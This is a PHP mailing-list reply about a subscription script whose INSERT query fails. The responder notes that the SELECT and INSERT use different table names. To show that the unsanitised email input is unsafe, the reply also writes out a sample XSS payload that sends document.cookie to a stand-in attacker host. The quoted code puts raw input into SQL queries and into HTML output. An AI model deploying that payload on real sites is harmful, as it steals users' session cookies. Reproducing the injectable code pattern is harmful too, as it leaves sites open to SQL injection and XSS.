Yemi Obembe wrote:
the objective of the script below is to first search if a subscriber is already in a list before subscribing his email (so as to prevent double subscription). the select part works fine....but the insert doesnt. know why?
if ($v = strtolower($_POST['email'])) {
what happens when $_POST['email'] is equal to
'<script>
document.location = "http://www.evilkid.net/?stolencookie"+document.cookie;
</script>';
or something like that? Just something to think about.
$db = mysql_connect(mysql, "usser", "pw");
$con = mysql_select_db("ng",$db);
$sql = "SELECT * FROM mytable WHERE email='$v'";
$res = mysql_query( $sql ) ;
if ($row = mysql_fetch_array($res)) {
echo "<b>Your email: <u>$v</u> already in the list<br>";
}
else {
$sql_in = "INSERT INTO arcadia ('email') VALUES ('$v')";
$result_in = mysql_query($sql_in);
echo "<b>Your email: <u>$v</u> subscribed!<br>";
you use different table names in each query. is that the intention?
}
}
else {
include("index.php");
exit;
}
---------------------------------
A passion till tomorrow,
Opeyemi Obembe | ng.clawz.com
---------------------------------
Do you Yahoo!?
Yahoo! Search presents - Jib Jab's 'Second Term'
--
PHP Database Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
